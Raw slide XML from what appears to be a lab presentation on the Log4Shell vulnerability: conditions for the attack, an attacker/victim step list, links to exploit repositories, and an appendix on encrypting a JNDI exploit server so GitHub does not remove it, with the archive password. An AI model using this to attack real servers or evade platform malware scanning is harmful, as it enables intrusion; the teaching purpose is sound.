              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="430039" y="1310456"/>
            <a:ext cx="11331922" cy="4237087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065E4D6B-D8C7-3A47-03B3-287E0B55F499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430039" y="941124"/>
            <a:ext cx="6429324" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verify the remote code has been executed on the victim’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3601075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5572-F121-4516-AFA7-E780C5C876C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0C7E6BB-78A7-9532-6AC7-17B220B92B6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The conditions required to trigger the Log4shell attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A server with a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> version,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>An endpoint with any protocol (HTTP, TCP, etc.) that allows an attacker to send the exploit string,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A log statement that logs out the string from that request (with JNDI LDAP URI).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297295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637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91E1-6F68-3C42-6796-9744A3FBA177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Appendix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91461A8D-8C8B-CBC1-2C00-14CC9F2C3D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299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32CA0C-8DE4-47CF-7117-997C0348425B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solving LDAP download issue </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C6899F-B7AB-7642-86A9-2CADC2D8B2F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our LDAP is vulnerable on JDK 1.8.0_202 because it doesn’t filter JNDI queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GitHub will block it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For lab demonstration, we need the LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt it and upload it to GitHub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two versions of JNDI in LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JNDI 1.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JNDI 1.0 https://github.com/welk1n/JNDI-Injection-Exploit/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199951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DA4E89-65C8-02BC-61AB-3AD375AEF9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="870563" y="3860817"/>
            <a:ext cx="8908552" cy="967824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181B2367-9CD5-A9CD-8429-8162153ED7ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="870563" y="2076166"/>
            <a:ext cx="10638442" cy="967824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C0BBD0-6AE0-4588-6198-6C1E86B493F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870563" y="1680307"/>
            <a:ext cx="4714560" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Download the zipped and encrypted JNDI server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF83506-67C0-9C42-F2F4-AC150038CE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729046" y="1218642"/>
            <a:ext cx="4126523" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GitHub will remove the exploitable JNDI if we don’t encrypt the code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{679D66D6-59C8-43A7-5A1D-00DA0E6F69C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870563" y="3491485"/>
            <a:ext cx="2830903" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verify the downloaded code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323090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2844C9-97ED-8287-C1FE-0533ACEB4D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359508" y="2215340"/>
            <a:ext cx="11472984" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t> identifies a target system that utilizes the Apache Log4j library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t> crafts a malicious payload and sends the payload to a victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>logs the incoming malicious payload as it would with any other log message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>executes the attacker's arbitrary code embedded in the malicious payload. The victim is compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t> may attempt to escalate privileges to access sensitive data or carry out additional malicious actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t> may use the compromised system to exfiltrate data, launch additional attacks on other systems, or engage in other nefarious activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t> may conceal their activities on the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFEE711C-E350-C917-4D7D-4C1AD3CDD8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78997"/>
            <a:ext cx="12192000" cy="1515912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="450669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6D606-208C-2687-34C9-253773B9AADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414088" y="1613520"/>
            <a:ext cx="9091448" cy="1257409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6CA3BB-6411-DCF7-6C9D-74F4E25C5F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414088" y="3504949"/>
            <a:ext cx="8961897" cy="2027096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06CBD38-F10F-36F5-F403-9E6F5EE0F23B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414088" y="1244188"/>
            <a:ext cx="923779" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Decrypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CB0815-D5B5-16D4-1BFE-F7844B48D598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414088" y="3147089"/>
            <a:ext cx="720069" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unzip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="556324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0C427-985E-69D8-3CBB-D527BBD16B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147480" y="1916791"/>
            <a:ext cx="11720576" cy="906859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34A84D51-3F6C-80D3-F910-147672B773F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147480" y="3164384"/>
            <a:ext cx="10630821" cy="937341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD1A6639-7EE6-B7A6-F44E-5F936401B826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147480" y="4573847"/>
            <a:ext cx="11682472" cy="1440305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCBB48EB-049F-68A8-33CD-1F5CA9D97FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916778" y="5574631"/>
            <a:ext cx="1872179" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password: cyfi750</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2684392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9EAF-FF58-861F-352B-5B435F4C963F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can be deleted later</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123AAAAB-4DEA-AA3A-7E35-0ED7F9756E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7760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6A55E-620D-BA38-D77F-241C90E5819D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648376" y="0"/>
            <a:ext cx="10895247" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396936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7EC81-0E5F-C6B5-B77B-9C251E1BEABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283454" y="79720"/>
            <a:ext cx="11819644" cy="6698560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310159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9CBF319-B296-6B10-9253-B45C264977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4987" y="271462"/>
            <a:ext cx="8582025" cy="6315075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4189D694-2BB2-30A9-F911-C341AB2D283B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381344" y="5982512"/>
            <a:ext cx="3843681" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>States of Attacker and Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342941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05A9-0377-CF01-0018-1277E23CC95C}"/>
              </a:ext>
            </a:extLst>
